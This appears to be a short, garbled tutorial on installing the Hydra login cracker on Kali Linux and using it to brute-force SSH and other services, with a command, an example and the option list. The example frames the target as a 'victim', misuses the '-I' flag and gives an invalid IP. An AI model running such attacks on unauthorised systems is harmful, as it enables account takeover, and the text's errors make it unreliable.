What is Hydra Tool ?
Hydra Tool is a parallelized login cracker which upholds various conventions to assault. It I pre-introduced in Kali Linux used to lunch savage power or Dictionary assault Aginst username and secret phrase to various administrations like ftp, ssh, telnet, MS-SQL, and so on.
How to Install ?
Install hydra Using apt-get
Update apt database with apt-get
using the following command
sudo apt-get update
After updating apt database, We can install hydra
using apt-get
by running the following command:
sudo apt-get -y install hydra
Install hydra Using apt
Update apt database with
apt
using the following command.sudo apt update
After updating apt database, We can install
hydra
using apt
by running the following command:sudo apt -y install hydra
How to use it ?
Type this in terminal --
sudo hydra -I username -P wordlist.txt A.A.A.A service
Where,
~Username is the username which you want to hack
~worldlist.txt is text file which contains passwords
~A.A.A.A is IP adress of victim
~Service would be used for login example for ssh
Example of syntax
sudo hydra -I btc -P worldlist1.txt 10.38.321.21 ssh
Here is full syntax
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]
-R restore a previous aborted/crashed session-S perform an SSL connect-s PORT if the service is on a different default port, define it here-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE-p PASS or -P File try password PASS, or load several passwords from FILE-x MIN:MAX:CHARSET password bruteforce generation, type “-x -h” to get help-e nsr try “n” null password, “s” login as pass and/or “r” reversed login-u loop around users, not passwords (effective! implied with -x)-C FILE colon separated “login:pass” format, instead of -L/-P options-M FILE list of servers to be attacked in parallel, one entry per line-o FILE write found login/password pairs to FILE instead of stdout-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)-t TASKS run TASKS number of connects in parallel (per host, default: 16)-w / -W TIME waittime for responses (32s) / between connects per thread-4 / -6 prefer IPv4 (default) or IPv6 addresses-v / -V / -d verbose mode / show login+pass for each attempt / debug mode-U service module usage detailsserver the target server (use either this OR the -M option)service the service to crack (see below for supported protocols)OPT some service modules support additional input (-U for module help)